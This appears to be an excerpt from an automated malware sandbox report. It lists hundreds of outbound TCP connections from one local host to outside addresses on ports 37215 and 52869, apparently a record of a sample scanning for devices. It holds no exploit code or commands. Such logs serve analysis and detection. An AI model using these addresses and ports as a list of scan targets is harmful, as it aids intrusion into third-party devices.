                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.201.86.76:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.218.175.156:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.55.4.87:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.44.47.146:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.201.75.1:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.193.164.157:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.235.246.143:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.109.42.56:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.21.154.188:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.168.88.85:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.82.145.173:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.208.252.21:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.251.204.69:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.0.128.7:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.19.158.83:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.26.189.56:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.122.44.162:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.4.160.54:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.189.83.63:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.180.41.250:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.123.76.171:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.200.73.149:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.179.104.29:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.167.38.154:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.143.176.177:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.85.104.66:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.108.87.209:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.197.4.28:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.129.126.238:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.192.104.225:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.166.222.209:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.29.76.164:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.175.58.87:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.84.211.107:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.3.104.242:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.37.140.12:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.137.41.55:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.49.135.255:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.146.116.27:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.73.96.138:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.110.231.177:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.214.1.44:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.206.132.72:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.118.154.209:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.228.219.189:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.106.13.149:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.141.251.209:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.97.75.174:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.124.206.161:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.123.0.75:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.242.125.247:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.65.146.87:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.185.55.103:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.32.66.128:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.18.75.228:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.37.217.115:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.41.141.214:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.71.96.103:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.138.90.168:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.196.193.11:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.143.55.124:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.48.118.207:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.164.56.20:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.232.180.64:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.139.159.103:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.119.186.32:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.226.207.227:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.99.19.0:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.54.35.162:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.41.72.34:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.221.240.250:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.105.180.224:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.59.115.60:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.178.149.192:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.244.133.193:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.127.150.36:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.39.223.64:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.113.41.209:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.54.150.183:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.55.190.162:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.180.123.151:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.93.6.140:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.136.79.34:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.206.169.62:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.114.221.204:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.67.169.226:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.182.84.233:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.226.17.179:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.69.200.222:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.109.16.254:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.173.237.149:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.14.48.61:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.125.238.142:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.5.58.129:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.120.67.123:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.205.234.149:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.127.234.148:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.192.173.117:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.207.45.185:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.185.236.100:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.209.220.210:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.7.151.17:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.241.205.191:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.95.189.156:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.212.236.205:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.117.70.85:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.72.206.175:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.108.217.111:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.141.18.115:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.167.223.119:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.67.205.80:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.48.176.125:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.183.67.255:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.119.178.166:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.235.79.231:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.137.20.142:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.233.31.3:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.48.231.229:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.73.48.97:37215
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.228.250.164:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.139.180.158:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.97.165.36:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.67.98.156:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.173.43.63:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.93.238.145:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.67.45.23:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.32.205.50:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.172.207.207:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.83.208.164:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.53.110.197:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.233.151.89:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.137.220.121:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.3.239.33:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.104.21.47:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.151.111.176:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.12.45.253:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.145.40.133:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.219.107.67:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.200.247.195:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.208.166.184:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.65.98.241:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.179.224.121:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.154.184.162:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.13.236.45:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.227.82.197:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.186.39.246:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.125.97.141:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.141.120.126:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.224.57.152:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.33.143.247:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.168.227.67:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.45.149.162:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.187.255.199:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.65.218.8:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.228.104.123:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.102.30.139:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.167.246.173:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.248.47.236:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.198.101.231:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.102.177.70:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.143.222.101:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.97.79.175:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.77.47.165:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.9.66.189:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.155.107.215:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.136.137.2:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.127.65.164:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.94.104.170:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.142.115.80:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.109.7.246:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.163.99.61:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.42.149.39:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.23.44.70:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.228.73.222:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.39.170.29:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.130.50.143:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.166.217.88:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.109.197.32:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.181.243.66:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.125.182.234:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.176.55.5:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.146.24.77:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.94.17.115:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.19.186.5:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.142.195.183:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.60.170.108:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.184.113.196:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.172.218.27:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.194.99.177:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.101.84.0:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.168.181.34:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.206.103.48:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.36.211.210:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.38.38.189:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.147.39.7:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.115.33.89:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.170.235.137:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.209.196.111:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.178.143.172:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.198.98.27:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.71.10.161:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.153.135.43:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.149.225.83:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.2.15.142:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.19.49.120:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.217.173.85:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.137.106.238:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.154.176.253:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.186.211.102:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.96.163.158:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.204.68.245:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.64.216.109:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.83.201.85:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.253.159.20:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.35.46.175:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.223.156.79:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.112.184.175:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.180.242.14:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.220.32.255:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.205.131.199:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.65.145.57:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.252.254.180:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.177.16.139:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.72.49.217:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.98.196.52:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.205.120.129:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.217.38.40:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.240.158.66:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.219.219.111:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.21.94.144:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.225.62.24:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.186.45.219:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.254.151.225:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.45.245.56:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.204.188.9:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.137.233.137:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.143.207.152:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.45.4.225:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.177.40.198:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.16.78.32:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.128.198.91:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.39.161.208:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.59.12.93:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.158.4.201:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.254.206.192:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.147.243.18:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.90.129.148:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.13.10.206:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.38.177.76:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.226.126.143:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.170.77.209:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.158.230.10:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.246.165.112:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.218.55.254:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.44.26.163:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.90.224.133:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.21.219.76:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.38.253.33:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.73.199.249:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.169.9.146:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.170.130.209:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.51.139.214:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.142.144.197:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.245.60.136:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.145.64.117:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.68.192.71:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.23.224.14:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.88.133.183:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.20.159.16:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.81.122.44:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.44.145.117:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.222.24.198:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.60.82.74:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.92.136.30:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.169.93.206:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.227.240.70:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.215.79.77:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.81.118.135:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.208.37.68:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.211.5.3:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.86.151.248:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.153.33.14:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.127.231.98:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.138.118.149:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.94.19.20:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.125.7.48:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.63.182.18:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.88.242.222:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.35.22.185:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.172.196.144:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.86.135.210:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.174.251.244:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.55.35.57:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.30.58.167:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.72.239.19:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.179.136.103:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.190.40.236:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.240.206.251:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.7.136.2:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.129.186.25:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.128.189.52:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.237.185.59:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.0.222.248:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.91.120.100:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.3.230.189:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.10.90.44:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.235.138.72:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.99.39.115:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.81.226.76:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.171.136.198:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.45.202.165:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.250.198.69:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.147.96.99:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.144.123.142:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.23.60.11:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.119.119.50:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.210.25.165:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.216.215.104:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.206.80.37:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.156.106.227:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.249.156.42:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.89.199.88:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.151.255.139:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.204.232.193:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.193.111.70:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.83.14.43:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.157.135.177:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.13.103.154:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.53.47.86:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.164.205.163:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.170.151.232:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.112.168.107:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.94.41.224:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.27.40.202:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.220.226.17:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.113.20.192:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.114.47.194:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.44.37.254:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.98.92.13:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.247.174.16:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.243.110.59:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.178.228.116:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.156.123.183:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.84.144.215:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.103.48.208:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.163.103.132:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.220.93.230:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.149.7.132:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.81.34.243:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.254.82.155:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.152.132.174:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.188.62.103:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.208.13.4:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.121.93.96:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.186.49.139:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.168.235.81:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.60.171.209:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.104.75.153:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.222.127.0:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 91.116.137.132:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.166.134.137:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 185.61.133.21:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.30.49.1:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.46.233.138:52869
                Source: global trafficTCP traffic: 192.168.2.23:4760 -> 45.160.245.183:52869
